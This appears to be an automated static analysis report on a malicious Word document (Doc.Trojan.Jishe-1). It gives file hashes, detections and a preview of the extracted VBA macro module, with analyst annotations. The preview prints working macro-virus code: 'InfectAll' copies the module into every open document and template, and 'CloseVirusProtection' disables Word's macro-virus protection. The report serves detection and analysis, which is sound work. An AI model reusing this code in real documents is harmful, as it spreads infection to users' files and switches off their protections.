Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 12c760ee5ffc262e…

MALICIOUS

Office (OLE)

83.5 KB Created: 2001-06-19 07:41:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 4e9d1a09563e3eb81dd5cd4d5037fb2b SHA-1: ff32e1fa724e5a6ee52c3400aa8b4f4e1cf8ff6d SHA-256: 12c760ee5ffc262eb44c164153deadd0605922646cdb78514838701e77e623b0
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Jishe-1'. Static analysis revealed the presence of VBA macros. The extracted VBA script, named 'macros.bas', contains functions such as 'InfectAll', 'ClearVirus' and 'ScanVirus'; although its header comments describe the module as a macro-virus "vaccine", 'InfectAll' copies the module into every open document and template, which is self-propagating behaviour, and 'CloseVirusProtection' switches off Word's built-in macro-virus protection. The script header also contains an email address, 'club@263.net', given there as the author's contact; it may be a contact for the malware author or a command and control channel, though nothing in the visible code uses it for communication.

Heuristics 2

  • ClamAV: Doc.Trojan.Jishe-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Jishe-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32314 bytes
SHA-256: 96351818b6297f0f2285aab391e9fb2d73da08031eab6ac21ca23a42e41c6195
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "JiShenhua"
' Module header, translated from the original GBK-encoded Chinese comments
' (they appear above as Latin-1 mojibake):
'   "This is a macro-virus prevention/removal program I wrote while learning;
'    it can prevent infection by some WORD macro viruses. It needs a large set
'    of macro-virus signatures as its basis; if you find a macro virus this
'    vaccine cannot handle, please contact me promptly. You may also modify
'    this program yourself to strengthen the vaccine. Fighting viruses is like
'    resisting crime and needs everyone's joint effort. You are welcome to
'    join and become a fighter; perhaps you are the warrior everyone has been
'    waiting for."
' Program design: 冀慎华 (Ji Shenhua, matching the module name)
' Office phone: (left blank)
' E-mail address: club@263.net
' NOTE(analysis): whatever the stated purpose, InfectAll below calls Infect on
' every open document and loaded template, and the author's own comment on
' Infect describes it as copying this module between files -- i.e. the module
' self-propagates. CloseVirusProtection also turns Word's macro-virus
' protection off by default.
Option Explicit ' all variables in this module must be declared before use
Public pVirusReport As String ' virus description text; reset to "" by ScanVirus
Private Const cMyID As String = "MyMacroVirusKillerV2.0" ' marker string identifying this program's code
Private Const cMyModule As String = "JiShenhua" ' name of this program's VBA module
Private Const cMyUserForm As String = "VirusReport" ' name of this program's user form
' ScanDocument result codes (ScanDocument itself is not in this preview):
Private Const cOK As Integer = 0 ' everything normal
Private Const cDocHasModuleElse As Integer = 1 ' another module exists
Private Const cDocHasCodeElse As Integer = 2 ' other code exists in the ThisDocument module
Private Const cDocHasAllElse As Integer = 3 ' other code in ThisDocument AND another module exists
Private Const cDocProtected As Integer = 4 ' the document is protected
'从指定文件中向所有打开文档及模板中复制本程序代码及模块 (decoded from GBK mojibake: copies this program's code and module from the specified file into every open document and template)
Public Function InfectAll() As Boolean
    ' Calls Infect on every open document and every loaded template. Infect's
    ' body is cut off in this preview; the author's comment on it describes it
    ' as copying this program's code from one file into another.
    ' Always returns True: Infect's own Boolean result is discarded, so a
    ' failed copy is never reported to the caller.
    ' NOTE(analysis): this is the self-propagation routine that makes the
    ' module a macro virus regardless of its "vaccine" framing.
    Dim myDoc As Document, myTemp As Template
    ' Write this code into each open document
    For Each myDoc In Documents
        Infect myDoc
    Next myDoc
    ' Write this code into each Word template
    For Each myTemp In Templates
        Infect myTemp
    Next myTemp
    InfectAll = True
End Function
'Çå³ýËùÓдò¿ªÎĵµ¼°Ä£°åÖеIJ¡¶¾Ä£¿é¼°´úÂë
Public Function ClearVirus() As Boolean
    ' Calls ClearDocument (not visible in this preview) on every open document
    ' and every loaded template. Returns True only if every call succeeded;
    ' each failure shows a message box captioned with the document/template
    ' name and sets the result to False, but does not stop the loop.
    Dim i As Integer ' unused
    Dim myDoc As Document, myTemp As Template
    Dim Cleared As Boolean ' result of the most recent ClearDocument call

    ClearVirus = True
    ' Check every open document and clean it
    For Each myDoc In Documents
        Cleared = ClearDocument(myDoc)
        If Not Cleared Then
            ' Message text (GBK, decoded): "Virus removal was not successful, please check the cause."
            MsgBox "²¡¶¾Çå³ý¹¤×÷²»³É¹¦£¬Çë¼ì²éÔ­Òò¡£", vbOKOnly, myDoc.Name
            ClearVirus = False
        End If
    Next myDoc
    ' Check every loaded template and clean it
    For Each myTemp In Templates
        Cleared = ClearDocument(myTemp)
        If Not Cleared Then
            ' Same message as above, captioned with the template name
            MsgBox "²¡¶¾Çå³ý¹¤×÷²»³É¹¦£¬Çë¼ì²éÔ­Òò¡£", vbOKOnly, myTemp.Name
            ClearVirus = False
        End If
    Next myTemp
End Function
'¼ì²éËùÓдò¿ªµÄÎĵµ¼°Ä£°åÖÐÊÇ·ñÓв¡¶¾´æÔÚ£¬Èç¹ûÓУ¬·µ»Ø²¡¶¾ÐÅÏ¢ÃèÊö×Ö·û´®
Public Function ScanVirus() As Boolean
    ' Runs ScanDocument (not visible in this preview) over every open document
    ' and loaded template. Returns True if any target yields one of the
    ' "has other module/code" codes (cDocHasModuleElse, cDocHasCodeElse,
    ' cDocHasAllElse). cOK and cDocProtected fall through silently, so
    ' protected files are skipped without notice; any other code only shows
    ' a message box and does not change the result.
    ' NOTE(analysis): judging by the constant names, "virus" here appears to
    ' mean any VBA module or ThisDocument code other than this program's own;
    ' ScanDocument's actual test is not shown, so treat that as an inference.
    ' The header comment promises a description string, but this body only
    ' resets pVirusReport to "" -- presumably ScanDocument fills it; not verified.
    Dim DocsCount As Integer, i As Integer, ret As Integer ' DocsCount and i are unused
    Dim myStr As String ' unused
    Dim myDoc As Document, myTemp As Template
    
    ScanVirus = False
    pVirusReport = "" ' clear the public report before scanning
    ' Check each open document for a virus
    For Each myDoc In Documents
        ret = ScanDocument(myDoc)
        Select Case ret
            Case cOK, cDocProtected
                ' nothing to report for this document
            Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse
                ScanVirus = True
            Case Else
                ' Message (GBK, decoded): "Function ScanDocument returned an
                ' error code the system cannot recognise." Caption: "System error".
                MsgBox "º¯ÊýScanDocument·µ»Ø´íÎó´úÂ룬ϵͳÎÞ·¨Ê¶±ð¡£", vbOKOnly, "ϵͳ³ö´í"
        End Select
    Next myDoc
    ' Check each loaded template
    For Each myTemp In Templates
        ret = ScanDocument(myTemp)
        Select Case ret
            Case cOK, cDocProtected
                ' nothing to report for this template
            Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse
                ScanVirus = True
            Case Else
                ' Same "unrecognised return code" message as above
                MsgBox "º¯ÊýScanDocument·µ»Ø´íÎó´úÂ룬ϵͳÎÞ·¨Ê¶±ð¡£", vbOKOnly, "ϵͳ³ö´í"
        End Select
    Next myTemp
End Function
'关闭Word宏病毒保护功能 (decoded from GBK mojibake: turns off Word's macro-virus protection feature)
Public Function CloseVirusProtection(Optional Protected As Boolean = False)
    ' Assigns the argument to Word's Options.VirusProtection setting. With the
    ' default (False) this turns the built-in macro-virus warning OFF; passing
    ' True would re-enable it. No return type is declared, so the function
    ' returns an empty Variant.
    ' NOTE(defence): a macro clearing Options.VirusProtection is a strong
    ' indicator on its own and is worth alerting on independently of the
    ' propagation code.
    Options.VirusProtection = Protected
End Function
'把本程序代码从一个文件复制到另一个文件中 (decoded from GBK mojibake: copies this program's code from one file into another)
Private Function Infect(TargetFile) As Boolean
    Dim xItem, CommandStr As String, file As String
    Dim myDoc As Document, myTemp As Template
    Dim LinesofCode As Long, myStr As String
    
    '¼ì²é²ÎÊýÀàÐÍÊÇ·ñÕýÈ·
    myStr = TypeName(TargetFile)
    If myStr <> "Document" And myStr <> "Template" Then
        MsgBox "ʹÓÃÊý¾ÝÀàÐÍ" + myStr + "µ÷Óú¯ÊýInfect£¬ÏµÍ³Ö»ÔÊÐíʹÓÃDocument¼°TemplateÀàÐÍ¡£", vbOKOnly, "ϵͳ´íÎó"
        Infect = False
        Exit Function
    End If
    Infect = True
    If TargetFile.Name = ThisDocum
... (truncated)